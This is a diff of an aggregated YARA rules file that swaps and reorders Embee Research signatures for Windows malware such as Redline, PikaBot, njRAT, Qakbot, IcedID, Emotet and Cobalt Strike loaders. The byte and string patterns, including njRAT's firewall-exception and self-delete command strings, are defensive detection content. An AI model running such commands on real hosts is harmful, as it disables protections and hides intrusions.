+		logic_hash = "d50f57e32a7f513d92625549fcd139b7fa1e478879283fd61426fcd19d03d296"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = {1F ?? 8D ?? ?? ?? 01 25 16 72 ?? ?? ?? 70 A2 25 17 72 ?? ?? ?? 70 28 ?? ?? ?? 0A A2 25 18 20 ?? ?? ?? 00 13 04 12 04 28 ?? ?? ?? 0A A2 25 19 20 ?? ?? ?? 00 13 ?? 12 }
-		$s2 = "\\Medusa\\obj\\Release\\Medusa.pdb" ascii
+		$s1 = {8b 4d f0 89 4d f8 8b 45 f8 c1 e0 03 33 d2 b9 06 00 00 00 f7 f1 8b e5 5d c2 04 00}
 
 	condition:
-		$s1 or $s2
+		( all of ( $s* ) )
 }
-rule EMBEERESEARCH_Win_Berbew_Strings_Dec_2023
+rule EMBEERESEARCH_Win_Redline_Loader_Dec_2023
 {
 	meta:
-		description = "Strings observed in Berbew malware."
+		description = "Patterns observed in redline loader"
 		author = "Matthew @ Embee_Research"
-		id = "402711af-c543-5c95-ae9e-e663825b6653"
+		id = "59d933a8-8ccd-565f-b379-e0bf6c3d3111"
 		date = "2023-12-24"
-		modified = "2023-12-26"
+		modified = "2023-12-29"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_berbew_strings_dec_2023.yar#L1-L19"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_loader_dec_2023.yar#L1-L20"
 		license_url = "N/A"
-		hash = "24dc0af3c51118697df999d8bffcdfc9cbf0d07f2630473450dd826a1ae4b9ae"
-		logic_hash = "a7f687e749ec69961777063d52678461a8e288c80037fac051d7b1a5b568d9e8"
+		hash = ""
+		logic_hash = "831c32f9998b97f7ceeb14df73a264a998df5f8800aaa5271755aaaeac070010"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = "This KEWL STUFF was coded by V. V. PUPKIN"
-		$s2 = "REAL CASH, REAL BITCHEZ"
-		$s3 = "Please, enter your Card Number"
+		$s1 = {8b ?? ?? 0c 30 04 31 46 3b f7 7c ?? 5d 5b 5e 83 ?? ?? 75}
+		$s2 = "WritePrivateProfileStringA"
+		$s3 = "SetFileShortNameA"
+		$s4 = "- Attempt to use MSIL code from this assembly during native code initialization"
 
 	condition:
 		all of them
 }
-rule EMBEERESEARCH_Win_Cobalt_Sleep_Encrypt : FILE
+rule EMBEERESEARCH_Win_Pikabot_Loader_Bytecodes_Oct_2023
 {
 	meta:
-		description = "Detects Sleep Encryption Logic Found in Cobalt Strike Deployments"
+		description = "Detects bytecodes in recent PikaBot Loaders"
 		author = "Matthew @ Embee_Research"
-		id = "6bd6fbb4-6634-5b51-90f0-f24e48d69043"
-		date = "2023-08-27"
-		modified = "2023-10-18"
+		id = "c15b9390-1d20-5325-81c3-c6cf59ffb21f"
+		date = "2023-10-03"
+		modified = "2023-10-08"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_sleep_encrypt_aug_2023.yar#L1-L55"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_pikabot_loader_bytecodes_oct_2023.yar#L3-L24"
 		license_url = "N/A"
-		hash = "26b2f12906c3590c8272b80358867944fd86b9f2cc21ee6f76f023db812e5bb1"
-		logic_hash = "7aa2674ecaaae819c3f26924fa0622df322b1214493f37b1bdf5e00ba5ee98e6"
+		hash = "778b6797bb9c9d2f868d3faaaf6b36ce3f06178c133bb592c5345c95ffb034a9"
+		hash = "e26d44d740b4edbd37fa6196dcc9171e49e711d8ce64f67aae36c4299e352108"
+		hash = "2d212cacc4767ef4383bdf462a9bb8aaf87f0b3c55b4c2f4a47c97c710ec1cd8"
+		logic_hash = "a078df39fda5ab6f432c4bf42fb61bdf106386d9684188189e3cea81803b3952"
 		score = 75
 		quality = 75
-		tags = "FILE"
+		tags = ""
 
 	strings:
-		$r1_nokey = {4E 8B 04 08 B8 ?? ?? ?? ?? 41 F7 E3 41 8B C3 C1 EA 02 41 FF C3 6B D2 0D 2B C2 8A 4C 18 18 41 30 0C 38 48 8B 43 10 41 8B FB 4A 3B 7C 08 08}
-		$r2_nokey = {49 8B F9 4C 8B 03 B8 ?? ?? ?? ?? 41 F7 E1 41 8B C1 C1 EA 02 41 FF C1 6B D2 0D 2B C2 8A 4C 18 18 42 30 0C 07 48 FF C7 45 3B CB}
+		$s1 = { 8b 59 64 a1 58 00 ?? ?? 8b 8e d0 00 00 00 2b c1 2d d9 f1 3e 41 0f af da 09 46 20 a1 34 dd ?? ?? 8b d3 2b 88 a0 00 00 00 2b 0d bc ff ?? ?? 81}
+		$s2 = { 88 14 08 8b cb 8b 15 a0 6a ?? ?? 42 c1 e9 08 89 15 a0 6a ?? ?? 8b 46 20 2b 05 ec 6a ?? ?? 05 ae 49 08 00}
+		$s3 = { 03 d8 43 a1 d4 8e ?? ?? 33 18 89 1d 18 8f ?? ?? a1 d4 8e ?? ?? 8b 15 18 8f ?? ?? 89 10 8b 45 f8 83 c0 04 89 45 f8 33 c0 a3 14 8f ?? ?? a1 d4 8e ?? ?? 83 c0 04 03 05 14 8f ?? ?? a3 d4 8e ?? ?? 8b 45 f8 3b 05 e0 8e ?? ?? }
 
 	condition:
-		($r1_nokey or $r2_nokey )
+		$s1 or $s2 or $s3
 }
-rule EMBEERESEARCH_Win_Redline_Payload_Dec_2023
+rule EMBEERESEARCH_Win_Orcus_Rat_Simple_Strings_Dec_2023
 {
 	meta:
-		description = "Patterns observed in redline"
+		description = "Strings observed in Orcus RAT"
 		author = "Matthew @ Embee_Research"
-		id = "6208779a-69b2-55b5-9744-987575c00d96"
+		id = "baef6b96-bf94-5363-9186-9761a8055afd"
 		date = "2023-12-24"
-		modified = "2023-12-29"
+		modified = "2023-12-24"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_payload_dec_2023.yar#L1-L16"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_orcus_rat_simple_strings_dec_2023.yar#L1-L26"
 		license_url = "N/A"
-		hash = "5790aead07ce0b9b508392b9a2f363ef77055ae16c44231773849c87a1dd15a4"
-		logic_hash = "d016baa5017120a3037e9cef7fd649228f7be60e511ecbdedf97916f59eec881"
+		hash = "30a2a674d55d7898d304713dd2f69a043d875230ea7ebee22596ba4c640768db"
+		logic_hash = "2e0a44ec2749e0fc646dfb003a2d32b3fecfa07ece72ca5a65116250d80496b8"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = {16 72 ?? ?? ?? 70 A2 7E ?? ?? ?? 04 17 72 ?? ?? ?? 70 7E ?? ?? ?? 04 16 9A 28 ?? ?? ?? 06 A2 7E ?? ?? ?? 04 18 72 ?? ?? ?? 70 }
+		$s1 = "Orcus is a Remote Administration Tool for Windows. It allows the administrator to make changes to the system remotely." wide
+		$s2 = "Orcus.Service" wide
+		$s4 = "costura.orcus" wide
+		$s5 = "Orcus.Commands"
+		$s6 = "Orcus.Shared"
+		$s7 = "Orcus.Utilities"
+		$s8 = "Orcus.StaticCommands"
+		$s9 = "Orcus.Plugins"
 
 	condition:
-		all of them
+		(5 of them )
 }
-rule EMBEERESEARCH_Win_Darkgate_Xllloader_Oct_2023
+rule EMBEERESEARCH_Win_Cobalt_Strike_Loader_Shellcode_Jun_2023 : FILE
 {
 	meta:
-		description = "Detects XLL Files Related to DarkGate"
-		author = "Matthew @ Embee_Research"
-		id = "4b5d9a2d-90ee-5452-83be-1677e1888045"
-		date = "2023-10-03"
-		modified = "2023-10-04"
+		description = "Detection of an encoder observed with Cobalt Strike shellcode"
+		author = "Matthew @ Embee_research"
+		id = "ea52b9e7-f2bd-5c9f-9ee1-506baa48be84"
+		date = "2023-07-03"
+		modified = "2023-07-03"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_darkgate_xll_loader_oct_2023.yar#L2-L23"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_cobalt_shellcode_encoder_jun_2023.yar#L1-L21"
 		license_url = "N/A"
-		hash = "091b7c16791cf976e684fe22ee18a4099a4e26ec75fa145b85dd14603b466b00"
-		hash = "305de78353b0d599cd40a73c7e639df7f5946d1fc36691c8f7798a99ee6835e7"
-		hash = "98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f"
-		hash = "27ec297e1fc34e29963303782ff881e74f8bd4126f4c5be0c4754f745d85f79a"
-		hash = "392fd4d218a8e333bc422635e48fdfae59054413c7a6be764c0275752d45ab23"
-		hash = "9a34b32d0a66dd4f59aeea82ef48f335913c47c6ca901ab109df702cd166892f"
-		logic_hash = "ea9a166550c53225b0a06e2cd86760f63aed8973e889a457470bdba3d87ce6af"
+		logic_hash = "42b4b9ab681f3164168de84e76bcd8161865fa9e5871d70a6de534b23896e4f0"
 		score = 75
 		quality = 75
-		tags = ""
+		tags = "FILE"
+		vendor = ""
 
 	strings:
-		$s1 = "xlAutoOpen" wide ascii
-		$s2 = { 49 ?? ?? 4c ?? ?? 48 ?? ?? 48 ?? ?? 02 e8 ?? ?? ?? ?? 48 ?? ?? 31 ?? 48 ?? ?? 01 48 ?? ?? 41 ?? ?? ?? ?? 30 ?? 48 ?? ?? 01 49 ?? ?? 75 ?? }
+		$get_enc_offset = {8b 88 c0 00 00 00 8b 90 c4 00 00 00 48 8d b0 c8 00 00 00}
+		$decode_loop = {ac 83 e1 03 d2 c8 ff c1 aa ff ca 75 f3}
+		$b64_initial_bytes = "SInISIlMJAiLiMAAAACLkMQAAABIjbDIAAAA" wide ascii
 
 	condition:
-		( all of ( $s* ) )
+		(( $get_enc_offset and $decode_loop ) or $b64_initial_bytes ) and filesize < 10000KB
 }
-rule EMBEERESEARCH_Win_Redline_Loader_Dec_2023
+rule EMBEERESEARCH_Win_Redline_Updated_Bytecodes_Oct_2023
 {
 	meta:
-		description = "Patterns observed in redline loader"
+		description = "Configuration related bytecodes in redline .net files"
 		author = "Matthew @ Embee_Research"
-		id = "59d933a8-8ccd-565f-b379-e0bf6c3d3111"
-		date = "2023-12-24"
-		modified = "2023-12-29"
+		id = "1e4470cf-fad3-57e5-8a95-deb97e98dbdc"
+		date = "2023-10-11"
+		modified = "2023-10-11"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_loader_dec_2023.yar#L1-L20"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_redline_bytecodes_oct_2023.yar#L2-L35"
 		license_url = "N/A"
-		hash = ""
-		logic_hash = "831c32f9998b97f7ceeb14df73a264a998df5f8800aaa5271755aaaeac070010"
+		hash = "0cc3a0f8b48ef8d8562b9cdf9c7cfe7f63faf43a5ac6dc6973dc8bf13b6c88cf"
+		logic_hash = "77273ba3736baf2c197fb8b17de1e22ba8f2380f73f9114f324ef56bfa508654"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = {8b ?? ?? 0c 30 04 31 46 3b f7 7c ?? 5d 5b 5e 83 ?? ?? 75}
-		$s2 = "WritePrivateProfileStringA"
-		$s3 = "SetFileShortNameA"
-		$s4 = "- Attempt to use MSIL code from this assembly during native code initialization"
+		$s_1 = {
+				20 ?? ?? ?? ?? 											// ldc.i4
+				2B 00       											// br.s
+				28 ?? ?? ?? 2B 											// Call
+				80 ?? ?? ?? 04 											// stsfld
+				(20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70)   // ldc.i4, br.s, call OR ldstr
+				80 ?? ?? ?? 04      									// Call
+				(20 ?? ?? ?? ?? 2B00 28 ?? ?? ?? 2B | 72 ?? ?? ?? 70)   // ldc.i4, br.s, call OR ldstr
+				80 ?? ?? ?? 04 											// Call		
+				20 ?? ?? ?? ?? 											// ldc.i4
+				2B00            										// br.s
+				28 ?? ?? ?? 2B      									// Call
+				80 ?? ?? ?? 04 											// stsfld
+				2A 														// ret
+			}
+		$s_2 = "mscoree.dll"
 
 	condition:
-		all of them
+		$s_1 and $s_2
 }
-rule EMBEERESEARCH_Win_Pikabot_Loader_Bytecodes_Oct_2023
+
+rule EMBEERESEARCH_Win_Njrat_Bytecodes_V2_Oct_2023
 {
 	meta:
-		description = "Detects bytecodes in recent PikaBot Loaders"
+		description = ""
 		author = "Matthew @ Embee_Research"
-		id = "c15b9390-1d20-5325-81c3-c6cf59ffb21f"
+		id = "9090574e-7ad4-5207-af8b-7b56f2a1c917"
 		date = "2023-10-03"
 		modified = "2023-10-08"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_pikabot_loader_bytecodes_oct_2023.yar#L3-L24"
-		license_url = "N/A"
-		hash = "778b6797bb9c9d2f868d3faaaf6b36ce3f06178c133bb592c5345c95ffb034a9"
-		hash = "e26d44d740b4edbd37fa6196dcc9171e49e711d8ce64f67aae36c4299e352108"
-		hash = "2d212cacc4767ef4383bdf462a9bb8aaf87f0b3c55b4c2f4a47c97c710ec1cd8"
-		logic_hash = "a078df39fda5ab6f432c4bf42fb61bdf106386d9684188189e3cea81803b3952"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = { 8b 59 64 a1 58 00 ?? ?? 8b 8e d0 00 00 00 2b c1 2d d9 f1 3e 41 0f af da 09 46 20 a1 34 dd ?? ?? 8b d3 2b 88 a0 00 00 00 2b 0d bc ff ?? ?? 81}
-		$s2 = { 88 14 08 8b cb 8b 15 a0 6a ?? ?? 42 c1 e9 08 89 15 a0 6a ?? ?? 8b 46 20 2b 05 ec 6a ?? ?? 05 ae 49 08 00}
-		$s3 = { 03 d8 43 a1 d4 8e ?? ?? 33 18 89 1d 18 8f ?? ?? a1 d4 8e ?? ?? 8b 15 18 8f ?? ?? 89 10 8b 45 f8 83 c0 04 89 45 f8 33 c0 a3 14 8f ?? ?? a1 d4 8e ?? ?? 83 c0 04 03 05 14 8f ?? ?? a3 d4 8e ?? ?? 8b 45 f8 3b 05 e0 8e ?? ?? }
-
-	condition:
-		$s1 or $s2 or $s3
-}
-rule EMBEERESEARCH_Win_Stealc_Bytecodes_Oct_2023
-{
-	meta:
-		description = "Bytecodes present in Stealc decoding routine"
-		author = "Matthew @ Embee_Research"
-		id = "ecac28a0-cd77-5e6a-8af2-59ea62e733bf"
-		date = "2023-08-27"
-		modified = "2023-10-09"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_stealc_bytecodes_oct_2023.yar#L2-L21"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_bytecodes_v2_oct_2023.yar#L5-L27"
 		license_url = "N/A"
-		hash = "74ff68245745b9d4cec9ef3c539d8da15295bdc70caa6fdb0632acdd9be4130a"
-		hash = "9f44a4cbc30e7a05d7eb00b531a9b3a4ada5d49ecf585b48892643a189358526"
-		logic_hash = "d50f57e32a7f513d92625549fcd139b7fa1e478879283fd61426fcd19d03d296"
+		hash = "9877fc613035d533feda6adc6848e183bf8c8660de3a34b1acd73c75e62e2823"
+		hash = "40f07bdfb74e61fe7d7973bcd4167ffefcff2f8ba2ed6f82e9fcb5a295aaf113"
+		logic_hash = "0bdbf5715e3873d96c88a24ba08487af2b798d26cdcd3e35d783ce4828dae775"
 		score = 75
 		quality = 75
 		tags = ""
 
 	strings:
-		$s1 = {8b 4d f0 89 4d f8 8b 45 f8 c1 e0 03 33 d2 b9 06 00 00 00 f7 f1 8b e5 5d c2 04 00}
+		$s1 = {03 1F 72 2E ?? 03 1F 73 2E ?? 03 1F 74 2E ?? 03 1F 75 2E ?? 03 1F 76 2E ?? }
+		$s2 = {0B 14 0C 16 0D 16 13 ?? 16 13 ?? 14}
 
 	condition:
-		( all of ( $s* ) )
+		dotnet.is_dotnet and ( all of ( $s* ) )
 }
 rule EMBEERESEARCH_Win_Mystic_Stealer_Bytecodes_Sep_2023
 {
@@ -173361,84 +173337,50 @@ rule EMBEERESEARCH_Win_Mystic_Stealer_Bytecodes_Sep_2023
 	condition:
 		( all of them )
 }
-
-rule EMBEERESEARCH_Win_Njrat_Strings_Oct_2023
-{
-	meta:
-		description = ""
-		author = "Matthew @ Embee_Research"
-		id = "c89711cb-aae9-5409-80c2-145a8d5fca56"
-		date = "2023-10-03"
-		modified = "2023-10-03"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/win_njrat_strings_oct_2023.yar#L3-L25"
-		license_url = "N/A"
-		hash = "59d6e2958780d15131c102a93fefce6e388e81da7dc78d9c230aeb6cab7e3474"
-		logic_hash = "ed36a991aa2699486f1ef34f4f4d559a3dd351180602f017ad7d868e146c703b"
-		score = 75
-		quality = 75
-		tags = ""
-
-	strings:
-		$s1 = "netsh firewall delete allowedprogram" wide
-		$s2 = "cmd.exe /c ping 0 -n 2 & del" wide
-		$s3 = "netsh firewall add allowedprogram" wide
-		$s4 = "Execute ERROR" wide
-		$s5 = "Update ERROR" wide
-		$s6 = "Download ERROR" wide
-
-	condition:
-		dotnet.is_dotnet and ( all of ( $s* ) )
-}
-rule EMBEERESEARCH_Win_Gracewire_Loader_Dec_2022 : FILE
+rule EMBEERESEARCH_Win_Icedid_Encryption_Oct_2022 : FILE
 {
 	meta:
-		description = "Yara rule to detect GraceWireLoader via usage of Stack Strings"
+		description = "No description has been set in the source file - EmbeeResearch"
 		author = "Embee_Research @ Huntress"
-		id = "63d0cd9f-34f7-5ec4-8061-66d36859bd0c"
-		date = "2022-12-12"
+		id = "1ecbb3b3-dfc1-5d69-807d-3a44c39a3536"
+		date = "2022-10-14"
 		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_gracewire_loader_dec_2022.yar#L2-L24"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_icedid_encryption_oct_2022.yar#L1-L18"
 		license_url = "N/A"
-		logic_hash = "168af6d24c0646e90717f27e6ba4a18da8e92950ffa7a881243860305037da48"
+		logic_hash = "da657cf87e043a1fdb2ec683de8a7a12acb8c8f1c24034bb376d525c0a1c5740"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$ZwAllocateVirtualMemory = {c6 44 24 48 5a c6 44 24 49 77 c6 44 24 4a 41 c6 44 24 4b 6c c6 44 24 4c 6c c6 44 24 4d 6f c6 44 24 4e 63 c6 44 24 4f 61 c6 44 24 50 74 c6 44 24 51 65 c6 44 24 52 56 c6 44 24 53 69 c6 44 24 54 72 c6 44 24 55 74 c6 44 24 56 75 c6 44 24 57 61 c6 44 24 58 6c c6 44 24 59 4d c6 44 24 5a 65 c6 44 24 5b 6d c6 44 24 5c 6f}
-		$LdrGetProcedureAddress = {c6 44 24 50 4c c6 44 24 51 64 c6 44 24 52 72 c6 44 24 53 47 c6 44 24 54 65 c6 44 24 55 74 c6 44 24 56 50 c6 44 24 57 72 c6 44 24 58 6f c6 44 24 59 63 c6 44 24 5a 65 c6 44 24 5b 64 c6 44 24 5c 75 c6 44 24 5d 72 c6 44 24 5e 65 c6 44 24 5f 41 c6 44 24 60 64 c6 44 24 61 64 c6 44 24 62 72 c6 44 24 63 65 c6 44 24 64 73 c6 44 24 65 73 c6 44 24 66 00}
-		$LdrLoadDLL = {c6 44 24 50 4c c6 44 24 51 64 c6 44 24 52 72 c6 44 24 53 4c c6 44 24 54 6f c6 44 24 55 61 c6 44 24 56 64 c6 44 24 57 44 c6 44 24 58 6c c6 44 24 59 6c}
-		$ZwFreeVirtualMemory = {c6 44 24 30 5a c6 44 24 31 77 c6 44 24 32 46 c6 44 24 33 72 c6 44 24 34 65 c6 44 24 35 65 c6 44 24 36 56 c6 44 24 37 69 c6 44 24 38 72 c6 44 24 39 74 c6 44 24 3a 75 c6 44 24 3b 61 c6 44 24 3c 6c c6 44 24 3d 4d c6 44 24 3e 65 c6 44 24 3f 6d c6 44 24 40 6f c6 44 24 41 72 c6 44 24 42 79}
+		$IcedID = {41 0f b6 d3 44 8d 42 01 83 e2 03 41 83 e0 03 42 8a 44 84 40 02 44 94 40 43 32 04 33 42 8b 4c 84 40 41 88 04 1b 83 e1 07 8b 44 94 40 49 ff c3 d3 c8 ff c0 89 44 94 40 83 e0 07}
 
 	condition:
-		3 of them
+		$IcedID
 }
-rule EMBEERESEARCH_Win_Emotet_String_Patterns_Oct_2022 : FILE
+rule EMBEERESEARCH_Win_Qakbot_Api_Hashing_Oct_2022 : FILE
 {
 	meta:
-		description = "Detection of string hashing routines observed in emotet"
-		author = "Embee_Research @ HuntressLabs"
-		id = "fd9c3133-95dc-5dd8-9e94-ed85ad8e1fc7"
-		date = "2022-10-14"
-		modified = "2023-10-18"
-		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_emotet_string_patterns_oct_2022.yar#L1-L19"
+		description = "No description has been set in the source file - EmbeeResearch"
+		author = "@Embee_Research"
+		id = "b5478404-659d-5b3a-b722-f8ba33875d8a"
+		date = "2022-11-14"
+		modified = "2022-12-01"
+		reference = "https://twitter.com/embee_research/status/1592067841154756610"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_qakbot_api_hashing_oct_2022.yar#L2-L21"
 		license_url = "N/A"
-		logic_hash = "36f4a3fed124b8c25711f706c5b4f1c9b0801c2105cf86077b8c002dd70a6fbc"
+		logic_hash = "595cabd508ee60c5606f965eb9a290ae21ea32af0f56e213f6ce2d2e35dc4e11"
 		score = 75
 		quality = 75
 		tags = "FILE"
+		vendor = "Huntress Labs"
 
 	strings:
-		$em1 = {45 33 f6 4c 8b d0 48 85 c0 74 64 48 8d 14 b3 4c 8b c0 45 8b de 4c 8b ca 4c 2b cb 49 83 c1 03 49 c1 e9 02 48 3b da 4d 0f 47 ce}
-		$em2 = {8b cd 49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00 0f b7 c1 c1 e9 10 66 c1 e8 08 4d 8d 40 08 66 41 89 40 fa 0f b6 c1 66 c1 e9 08 66 41 89 40 fc 66 41 89 48 fe 4d 3b d9}
-		$em3 = {49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00}
-		$em4 = {8b cb 41 8b d0 d3 e2 41 8b cb d3 e0 03 d0 41 0f be c1 03 d0 41 2b d0 49 ff c2 44 8b c2}
+		$qakbot_hashing = {0f b6 04 39 33 f0 8b c6 c1 ee 04 83 e0 0f 33 34 85 ?? ?? ?? ?? 8b c6 c1 ee 04 83 e0 0f 33 34 85 ?? ?? ?? ?? 41 3b ca}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( any of them )
+		any of them
 }
 rule EMBEERESEARCH_Win_Nighthawk_Nov_2022 : FILE
 {
@@ -173491,72 +173433,76 @@ rule EMBEERESEARCH_Win_Nighthawk_Nov_2022 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 5000KB and ( ( ( ( 3 of ( $s* ) ) or ( 3 of ( $g* ) ) ) and ( ( 1 of ( $ror* ) ) and ( 1 of ( $gs_offset* ) ) ) ) or $shr_block )
 }
-rule EMBEERESEARCH_Win_Qakbot_String_Decrypt_Nov_2022 : FILE
+rule EMBEERESEARCH_Win_Emotet_String_Patterns_Oct_2022 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - EmbeeResearch"
-		author = "Embee_Research @ Huntress"
-		id = "0023872f-8edb-59d6-88eb-a76528ba6ec8"
-		date = "2022-11-14"
+		description = "Detection of string hashing routines observed in emotet"
+		author = "Embee_Research @ HuntressLabs"
+		id = "fd9c3133-95dc-5dd8-9e94-ed85ad8e1fc7"
+		date = "2022-10-14"
 		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_qakbot_string_decrypt_nov_2022.yar#L1-L15"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_emotet_string_patterns_oct_2022.yar#L1-L19"
 		license_url = "N/A"
-		logic_hash = "d225f69fa4dd0e8d7c98e7f8968ad285f05b232225e9ce1070b7a23257a0ef9d"
+		logic_hash = "36f4a3fed124b8c25711f706c5b4f1c9b0801c2105cf86077b8c002dd70a6fbc"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$qakbot_decrypt = {33 d2 8b c7 f7 75 10 8a 04 1a 8b 55 fc 32 04 17 88 04 39 47 83 ee 01}
+		$em1 = {45 33 f6 4c 8b d0 48 85 c0 74 64 48 8d 14 b3 4c 8b c0 45 8b de 4c 8b ca 4c 2b cb 49 83 c1 03 49 c1 e9 02 48 3b da 4d 0f 47 ce}
+		$em2 = {8b cd 49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00 0f b7 c1 c1 e9 10 66 c1 e8 08 4d 8d 40 08 66 41 89 40 fa 0f b6 c1 66 c1 e9 08 66 41 89 40 fc 66 41 89 48 fe 4d 3b d9}
+		$em3 = {49 ff c3 33 0b 48 8d 5b 04 0f b6 c1 66 41 89 00}
+		$em4 = {8b cb 41 8b d0 d3 e2 41 8b cb d3 e0 03 d0 41 0f be c1 03 d0 41 2b d0 49 ff c2 44 8b c2}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and $qakbot_decrypt
+		uint16( 0 ) == 0x5a4d and ( any of them )
 }
-rule EMBEERESEARCH_Win_Icedid_Encryption_Oct_2022 : FILE
+rule EMBEERESEARCH_Win_Qakbot_String_Decrypt_Nov_2022 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - EmbeeResearch"
 		author = "Embee_Research @ Huntress"
-		id = "1ecbb3b3-dfc1-5d69-807d-3a44c39a3536"
-		date = "2022-10-14"
+		id = "0023872f-8edb-59d6-88eb-a76528ba6ec8"
+		date = "2022-11-14"
 		modified = "2023-10-18"
 		reference = "https://github.com/embee-research/Yara-detection-rules/"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_icedid_encryption_oct_2022.yar#L1-L18"
+		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_qakbot_string_decrypt_nov_2022.yar#L1-L15"
 		license_url = "N/A"
-		logic_hash = "da657cf87e043a1fdb2ec683de8a7a12acb8c8f1c24034bb376d525c0a1c5740"
+		logic_hash = "d225f69fa4dd0e8d7c98e7f8968ad285f05b232225e9ce1070b7a23257a0ef9d"
 		score = 75
 		quality = 75
 		tags = "FILE"
 
 	strings:
-		$IcedID = {41 0f b6 d3 44 8d 42 01 83 e2 03 41 83 e0 03 42 8a 44 84 40 02 44 94 40 43 32 04 33 42 8b 4c 84 40 41 88 04 1b 83 e1 07 8b 44 94 40 49 ff c3 d3 c8 ff c0 89 44 94 40 83 e0 07}
+		$qakbot_decrypt = {33 d2 8b c7 f7 75 10 8a 04 1a 8b 55 fc 32 04 17 88 04 39 47 83 ee 01}
 
 	condition:
-		$IcedID
+		uint16( 0 ) == 0x5a4d and $qakbot_decrypt
 }
-rule EMBEERESEARCH_Win_Qakbot_Api_Hashing_Oct_2022 : FILE
+rule EMBEERESEARCH_Win_Havoc_Djb2_Hashing_Routine_Oct_2022 : FILE
 {
 	meta:
 		description = "No description has been set in the source file - EmbeeResearch"
-		author = "@Embee_Research"
-		id = "b5478404-659d-5b3a-b722-f8ba33875d8a"
-		date = "2022-11-14"
-		modified = "2022-12-01"
-		reference = "https://twitter.com/embee_research/status/1592067841154756610"
-		source_url = "https://github.com/embee-research/Yara-detection-rules//blob/ac56d6f6fd2a30c8cb6e5c0455d6519210a8b0f4/Rules/2022/win_qakbot_api_hashing_oct_2022.yar#L2-L21"
+		author = "embee_research @ HuntressLabs"
+		id = "cde3e14f-0671-5bcf-93e8-e0a0af9b462c"
+		date = "2022-10-11"
+		modified = "2023-10-18"
